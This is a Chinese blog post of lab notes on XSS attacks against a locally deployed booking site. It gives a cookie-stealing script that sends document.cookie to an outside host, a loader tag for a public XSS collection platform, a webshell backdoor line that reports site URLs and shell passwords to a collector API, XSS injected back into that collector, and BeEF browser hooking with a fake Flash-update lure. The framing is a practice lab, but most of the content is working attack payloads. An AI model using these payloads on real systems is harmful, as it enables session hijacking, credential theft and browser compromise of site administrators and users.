26.跨站订单反杀

文章介绍了如何利用jfdd靶场进行XSS漏洞的实战演练,包括如何设置和利用XSS脚本获取cookie。同时,讲解了使用Postman工具模拟数据包发送,以及如何在shell箱子中进行反杀操作。此外,还提到了Beef-xss框架在XSS攻击中的应用,包括安装和控制目标浏览器。
摘要由CSDN通过智能技术生成

一、jfdd靶场

1.下载军锋真人cs野战的源码

https://down.chinaz.com/soft/30902.htm
2本系统是单用户挂号查询系统,用户名和密码可以在初始化的时候自己设定,用户名和密码保存在config.php中,安装完可以自行修改。在安装之前首先配置一下config文件中的数据库名称密码等内容。
图片.png
安装前,请必须确认根目录的config.php文件可写然后在地址栏目输入安装地址 127.0.0.1/jfdd/install.php 一步步的安装。安装 期间会设置管理员密码。
图片.png
3.通过部署我们发现我们可以在订单界面输入我们的xss脚本,然后再由管理员去打开,实现我们的xss渗透。

2.实战演示

1.提交一条预约后,后端对数据进行显示

图片.png
图片.png
存在xss漏洞
图片.png可以看到具体要求里的元素有js代码

2.利用xss平台 获取cookie

https://xss.yt/index/User/index.html
图片.png
查看代码
图片.png将代码写入交互框
<sCRiPt/SrC=//xss.yt/bQCn>
图片.png
图片.png
图片.png收集到了对方的cookie和一些信息

3.利用自定义xss获取cookie

使用JS代码获取Cookie
<script>var img=document.createElement("img");img.src="http://xxxx/a?"+escape(document.cookie);<script>

二、postman工具

模拟数据包的发送
图片.png在body里看网页的详细信息

三、shell箱子反杀

1.利用在webshell程序中,植入后门,形成“黑吃黑”,用有后门的木马入侵的网站也就被木马制造者利用。

就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔了。
在WebShell箱子系统的首页可以看到一个api.asp的文件,如下所示 :
图片.png 如果我们访问该文件,并且携带有url和pass参数,那么我们可以成功访问该文件,但是该页面中没有任何内容,如下所示:
图片.png
图片.png图片.png
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主
WebShell库 https://github.com/tennc/webshell

2.搭建靶场

  1. 搭建一个asp的服务器,我们这里选用小旋风进行搭建
  2. 下载完成后解压到虚拟机里面。
  3. .默认端口为80 如果80端口被占用或不想用80可用记事本打开mian.boX修改至你要的端口。
  4. 靶场搭建将下载好的webshell箱子放在搭建好的服务器里面,这里我放到了8001端口下

图片.png 将hostURL修改成对应的IP地址,重启服务即可
图片.png
登录后台(账号密码都为:admin)
图片.png

3.进行反杀

我们就使用一个webshell,并且在其中写入一些后门语句,从而形成后门中的后门,(在箱子里的api调用.txt文件中有如何写入代码),将该webshell上传后的地址及其管理密码进行返回:
图片.png首先模拟原webshell箱子作者进行攻击
S E R V E R [ ‘ H T T P H O S T ’ ] = = > 获取的是对应的 i p 或者域名 < b r / > _SERVER[‘HTTP_HOST’] ==> 获取的是对应的ip或者域名<br /> SERVER[HTTPHOST]==>获取的是对应的ip或者域名<br/>_SERVER[‘PHP_SELF’] ==> 获取的是对应的php文件
将后门语句写入webshell中

$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
echo "<script src='http://192.168.0.126:8001/api.asp?url=$url&pass=$password&id=1'></script>";

图片.png
访问网址,发现有两个请求,另一个请求就是往shell箱子里发信息的
图片.png看到箱子里多了一条信息
图片.png图片.png模拟反杀
因为得到的密码会在箱子中展示,可以用利用xss漏洞
有的webshell原作者会利用加密、编码、拼接字符等技术来隐藏URL,因此我们使用别人的webshell时一定要进行代码审计
当我们代码审计获取到webshell沙箱的URL后,通过访问webshell沙箱来植入XSS代码窃取cookie
构造一条语句测试一下
图片.png
图片.png
测试成功图片.png
利用xss平台获取cookie
图片.png直接把第二个请求也就是往shell里发信息的请求单独拿出来,反杀箱子管理者的 人,将pass改成xss平台得代码
http://192.168.0.126:8001/api.asp?url=123.56.134.234/itsec.php&pass=
图片.png箱子管理者看到新的网址被得到后,我们也得到了管理者的cookie
图片.png利用postman工具
图片.png

四、Beef结合XSS攻击

1.安装Beef-xss

最新版kali安装beef-xss

apt-get install beef-xss

如果无法安装尝试更新命令
apt-get update
图片.png安装完成之后beef-xss启动,过程中要重置密码(密码输入时不可见,用户名是beef)
图片.png
启动成功

2.攻击

图片.png复制example,改成虚拟机的本机地址
)
将example填入存在xss漏洞的地方
图片.png
如果网页管理者不查看订单,则不会上线浏览器
图片.png假如管理者查看订单
图片.png则beef也相应出现浏览器
图片.png

3.控制

查看浏览器cookie值
cookie 存储本地,存活时间长,中小型
session 会话 储存服务端 存活时间短 大型 比如中国银行 金融等平台
PHPinfo页面上会有session

图片.png

控制跳转网页

图片.png

社工攻击 把flash图片地址放进去 ,骗他更新flash
用户点击会跳转GitHub上的beef

图片.png

图片.png

假如用户点击图片

图片.png

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值